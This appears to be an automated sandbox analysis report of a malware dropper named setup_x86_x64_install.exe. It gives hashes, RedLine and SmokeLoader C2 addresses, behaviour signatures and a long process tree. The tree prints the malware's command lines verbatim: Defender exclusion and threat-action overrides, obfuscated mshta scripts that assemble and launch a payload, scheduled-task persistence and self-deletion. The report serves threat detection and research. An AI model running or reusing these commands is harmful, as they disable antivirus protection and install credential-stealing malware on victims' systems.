Resubmissions
05-10-2021 16:27
211005-tx24csaah9 1004-10-2021 16:37
211004-t43cpsgfe7 1004-10-2021 07:39
211004-jhgtrsfhf8 1003-10-2021 18:09
211003-wryvvsffgk 1002-10-2021 23:31
211002-3hwsgaehhl 1002-10-2021 06:10
211002-gxfh5sdgg7 1001-10-2021 13:44
211001-q16deabhek 10Analysis
-
max time kernel
1803s -
max time network
1794s -
platform
windows11_x64 -
resource
win11 -
submitted
04-10-2021 16:37
General
-
Target
setup_x86_x64_install.exe
-
Size
6.4MB
-
MD5
c6e46aa3d6424b03e0a4ccb193d3eade
-
SHA1
c8b49055743fa7b4d6a982aea26efb627bb1f2e1
-
SHA256
5e2bf564a4f985a7482d505def1ec79c92566bf7eda4724811ee29b9c4a66156
-
SHA512
06e0c7d8012d4dbf1e6ccb7049c16d3041eb792261cc9910115c8663a45272c90cbce0ccd51875b8cd465b8f5a5c9f69164cc665b60787884ac42aec3aa7d32e
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
ANI
C2
45.142.215.47:27643
Extracted
Family
smokeloader
Version
2020
C2
http://fiskahlilian16.top/
http://paishancho17.top/
http://ydiannetter18.top/
http://azarehanelle19.top/
http://quericeriant20.top/
rc4.i32
rc4.i32
Signatures
-
Arkei
Arkei is an infostealer written in C++.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 29 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Arkei Stealer Payload 1 IoCs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 3 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 43 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 64 IoCs
-
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 4 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Checks for any installed AV software in registry 1 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 13 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 10 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
-
Suspicious use of SetThreadContext 9 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 31 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 28 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
-
Download via BitsAdmin 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 61 IoCs
-
Kills process with taskkill 5 IoCs
-
Modifies data under HKEY_USERS 46 IoCs
-
Modifies registry class 5 IoCs
-
Modifies system certificate store 2 TTPs 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious behavior: SetClipboardViewer 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1034cd265b5e0adcd.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1034cd265b5e0adcd.exeFri1034cd265b5e0adcd.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1034cd265b5e0adcd.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1034cd265b5e0adcd.exe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1034cd265b5e0adcd.exe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "" == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1034cd265b5e0adcd.exe" ) do taskkill -F -Im "%~nXU"7⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT: CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn ("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"11⤵
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM12⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM14⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "Fri1034cd265b5e0adcd.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10584c049c7f.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10584c049c7f.exeFri10584c049c7f.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\Z_V3sMNGsvI7rRpfvw0QMyp6.exe"C:\Users\Admin\Documents\Z_V3sMNGsvI7rRpfvw0QMyp6.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\aZ0YnrKtc10UIUgYsMgrAuZt.exe"C:\Users\Admin\Documents\aZ0YnrKtc10UIUgYsMgrAuZt.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\0l0xrtpnHHTLm65menBbcuXf.exe"C:\Users\Admin\Documents\0l0xrtpnHHTLm65menBbcuXf.exe"6⤵
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\inst002.exe"C:\Program Files (x86)\Company\NewProduct\inst002.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\2285034.scr"C:\Users\Admin\AppData\Roaming\2285034.scr" /S8⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\3436754.scr"C:\Users\Admin\AppData\Roaming\3436754.scr" /S8⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\8280124.scr"C:\Users\Admin\AppData\Roaming\8280124.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\8926187.scr"C:\Users\Admin\AppData\Roaming\8926187.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\5724610.scr"C:\Users\Admin\AppData\Roaming\5724610.scr" /S8⤵
-
C:\Users\Admin\Documents\CYhWK6wGUBr_0KUI2pFoRj1Q.exe"C:\Users\Admin\Documents\CYhWK6wGUBr_0KUI2pFoRj1Q.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Documents\CYhWK6wGUBr_0KUI2pFoRj1Q.exe" & exit7⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\uqqAcKDbb5l4Gg0p81LTojnE.exe"C:\Users\Admin\Documents\uqqAcKDbb5l4Gg0p81LTojnE.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6380 -s 2967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\vOsoiDDO3Q_G73JC3fZnrc96.exe"C:\Users\Admin\Documents\vOsoiDDO3Q_G73JC3fZnrc96.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 2807⤵
- Program crash
-
C:\Users\Admin\Documents\QKmrSnwh4KXiHnMhxSZE9bqV.exe"C:\Users\Admin\Documents\QKmrSnwh4KXiHnMhxSZE9bqV.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"7⤵
-
C:\Users\Admin\Documents\ptMWvC5dONO_GiXZIiDN46y3.exe"C:\Users\Admin\Documents\ptMWvC5dONO_GiXZIiDN46y3.exe"8⤵
-
C:\Users\Admin\Documents\9FYCmSt6meOsFYLuTdqw1vJu.exe"C:\Users\Admin\Documents\9FYCmSt6meOsFYLuTdqw1vJu.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\Documents\9FYCmSt6meOsFYLuTdqw1vJu.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"== """" for %w iN ( ""C:\Users\Admin\Documents\9FYCmSt6meOsFYLuTdqw1vJu.exe"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\Documents\9FYCmSt6meOsFYLuTdqw1vJu.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""== "" for %w iN ( "C:\Users\Admin\Documents\9FYCmSt6meOsFYLuTdqw1vJu.exe" ) do taskkill /f -Im "%~nXw"10⤵
-
C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""== """" for %w iN ( ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "== "" for %w iN ( "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRipT: cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ). RuN( "Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I & del /Q * " , 0 , true ) )12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I &del /Q *13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN"14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "14⤵
-
C:\Windows\SysWOW64\control.execontrol.exe ..\QVNGP.I14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\QVNGP.I15⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\QVNGP.I16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\QVNGP.I17⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -Im "9FYCmSt6meOsFYLuTdqw1vJu.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\J5vQKsMt5d8SFwzWTO3Fxk8I.exe"C:\Users\Admin\Documents\J5vQKsMt5d8SFwzWTO3Fxk8I.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\Documents\J5vQKsMt5d8SFwzWTO3Fxk8I.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\Documents\J5vQKsMt5d8SFwzWTO3Fxk8I.exe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\Documents\J5vQKsMt5d8SFwzWTO3Fxk8I.exe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "" == "" for %U In ( "C:\Users\Admin\Documents\J5vQKsMt5d8SFwzWTO3Fxk8I.exe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT: CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn ("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"14⤵
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM15⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM17⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "J5vQKsMt5d8SFwzWTO3Fxk8I.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\HkLf_4fWJBBP2aKw8B_EGPCJ.exe"C:\Users\Admin\Documents\HkLf_4fWJBBP2aKw8B_EGPCJ.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 17289⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\YmLtMJXE5kpG5PRH_W7AZRIX.exe"C:\Users\Admin\Documents\YmLtMJXE5kpG5PRH_W7AZRIX.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 2369⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\PlREWOPKJ6dQLCAu2xyyr7tT.exe"C:\Users\Admin\Documents\PlREWOPKJ6dQLCAu2xyyr7tT.exe"8⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6340 -s 2369⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\h1jIwRqS79rGCdmcelReC17s.exe"C:\Users\Admin\Documents\h1jIwRqS79rGCdmcelReC17s.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\2221701.scr"C:\Users\Admin\AppData\Roaming\2221701.scr" /S9⤵
-
C:\Users\Admin\AppData\Roaming\4873741.scr"C:\Users\Admin\AppData\Roaming\4873741.scr" /S9⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\6017135.scr"C:\Users\Admin\AppData\Roaming\6017135.scr" /S9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\yU0_O9fPOQ35Bic99nCSDCEy.exe"C:\Users\Admin\Documents\yU0_O9fPOQ35Bic99nCSDCEy.exe" silent8⤵
-
C:\Users\Admin\Documents\qR8T1u8Mf6IgWhERs6c5wOkA.exe"C:\Users\Admin\Documents\qR8T1u8Mf6IgWhERs6c5wOkA.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS5356.tmp\Install.exe.\Install.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS6901.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
